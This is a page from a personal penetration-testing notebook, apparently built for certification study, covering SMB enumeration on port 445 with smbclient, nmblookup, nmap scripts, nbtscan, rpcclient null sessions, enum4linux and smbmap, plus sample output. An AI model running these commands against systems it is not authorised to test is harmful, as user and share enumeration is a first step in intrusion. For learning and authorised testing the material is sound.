refabr1k's Pentest Notebook
  • refabr1k's Pentest Notebook
  • Steganography
  • Kali USB with persistence memory
  • useful tools
  • Understanding ICACLS permissions
  • INFO GATHERING
    • Port Knocking
    • 22 tcp - SSH
      • SSH Tunneling
    • 25 tcp - SMTP
    • 53 tcp/udp - DNS
    • 88 tcp - Kerberos
    • 161 udp - SNMP
    • 445 tcp - SMB
    • 1098,1099 tcp - Java RMI
    • 8009 tcp - AJP
    • 5901,5902 tcp - VNC
  • Web
    • XSS cookie stealing
    • PHP
    • Webdav
    • Wordpress
    • XML RPC
    • SQL Injection
    • SSRF
  • EXPLOITATION
    • File Transfers
    • Buffer Overflow
    • Bruteforce
      • Hashcat
      • Ophcrack (rainbow tables)
      • John The Ripper
    • PHP rce
    • Compiling
    • msfvenom
    • Reverse shell
    • Using ENV to escape Bad Characters
    • shellshock
    • Ncat Persistent Backdoor
  • PRIVESC - LINUX
    • Basic checks
    • Upgrading Shells
    • SUID
  • Privesc - Windows
    • Basic checks / powershell
    • Privesc Openings
    • LonelyPotato - SeImpersonatePrivilege
    • Enable RDP @ Firewall
    • NTLM (Pass The Hash)
  • Windows
    • NTDS.dit
    • Responder / SMB Relay
    • Attacking AD
      • AD Hacking Lab Setup
  • Metasploit
    • Basic Usage
    • Meterpreter
      • Pivoting
      • Windows Post Exploitation
  • Unsorted
    • other notes
  • eLearnSecurity eJPT
    • eJPT notes
  • OSWP
  • Getting started
  • WEP Attacks
    • WEP Attack (OPEN) - Clients connected
    • WEP Attack (OPEN) - Clientless
    • WEP Attack (SKA)
  • WPA/WPA2 Attacks
  • Scripts
    • get port from nmap
    • Curl response
    • ping sweep
    • iptables-counter.sh
    • (DNS) zonetransfer_check.sh
    • (DNS) dns-rev-brute.sh
    • (DNS) dns-fwd-brute.sh
    • (SMB) vuln-scan.sh
    • (SMB) samba-checker.sh
    • (SMTP) vrfy.py
    • (SNMP) mib-check.sh
  • Zeroday vulnerabilities explained
    • 2020-12 Solarwind supply chain
Powered by GitBook
On this page
  • SMBCLient
  • NMBLookup
  • SMBClient
  • Nmap Scan
  • NBTScan
  • RPCClient
  • Enum4Linux
  • SMBMap

Was this helpful?

  1. INFO GATHERING

445 tcp - SMB

Previous161 udp - SNMPNext1098,1099 tcp - Java RMI

Last updated 4 years ago

Was this helpful?

references:

SMBCLient

smbclient -L \\192.168.1.5

Enter WORKGROUP\root's password:

# Sharename       Type      Comment
#         ---------       ----      -------
#         IPC$            IPC       Remote IPC
#         share           Disk
#         wwwroot         Disk
#         ADMIN$          Disk      Remote Admin
#         C$              Disk      Default share
# Reconnecting with SMB1 for workgroup listing.
#Server               Comment
#         ---------            -------
#Workgroup            Master
#         ---------            -------

NMBLookup

nmblookup -A 192.168.0.5

# Looking up status of [ip]
#         [hostname]      <00> -         M <ACTIVE>
#         [hostname]      <20> -         M <ACTIVE>
#         WORKGROUP       <00> - <GROUP> M <ACTIVE>
#         WORKGROUP       <1e> - <GROUP> M <ACTIVE>
#                         <03> -         M <ACTIVE>
#         INet~Services   <1c> - <GROUP> M <ACTIVE>
#         IS~[hostname]   <00> -         M <ACTIVE>
# MAC Address = 00-50-56-XX-XX-XX

SMBClient

# use smb1
smbclient -L //10.10.10.10 --option='client min protocol=NT1' -U"administrator"

# no pass
smbclient -L //10.10.10.10 -N

Nmap Scan

nmap -v -p 139,445 -oG smb.txt  10.11.24.1-100

# smb enum script
nmap -p 139,445 --script smb-enum-users <ipaddress_here>

# Checks for OS of SMB
nmap -v -p 139,445 --script smb-os-discovery 10.11.24.85

#Checks for smb vulnerability
nmap -v -p 139,445 --script vuln <ipaddress_here>

NBTScan

nbtscan -r 10.11.24.0/24

RPCClient

Null sessions, In windows NT2000/XP default config for SMB allows for nullsessions to be created. In windows 2003/XP SP2 onwards, this is disabled. Use RPCClient to explore nullsessions.

Rpcclient -U "" 129.168.1.200

#Server info such as OS version, server type
srvinfo

#Users information
enumdomusers

#Show password policy
getdompwinfo

#Domain info
querydomaininfo

#find net share
netshareenum

Enum4Linux

enum4linux -v 192.168.1.200

SMBMap

smbmap -H 192.168.1.5

 [+] Finding open SMB ports....
 [+] User SMB session establishd on [ip]...
 [+] IP: [ip]:445        Name: [ip]                                     
         Disk                                                    Permissions
         ----                                                    -----------
         ADMIN$                                                  NO ACCESS
         C$                                                      NO ACCESS
         IPC$                                                    NO ACCESS
         NETLOGON                                                NO ACCESS
         Replication                                             READ ONLY
         SYSVOL                                                  NO ACCESS

https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html#nmblookupAnother
http://www.madirish.net/59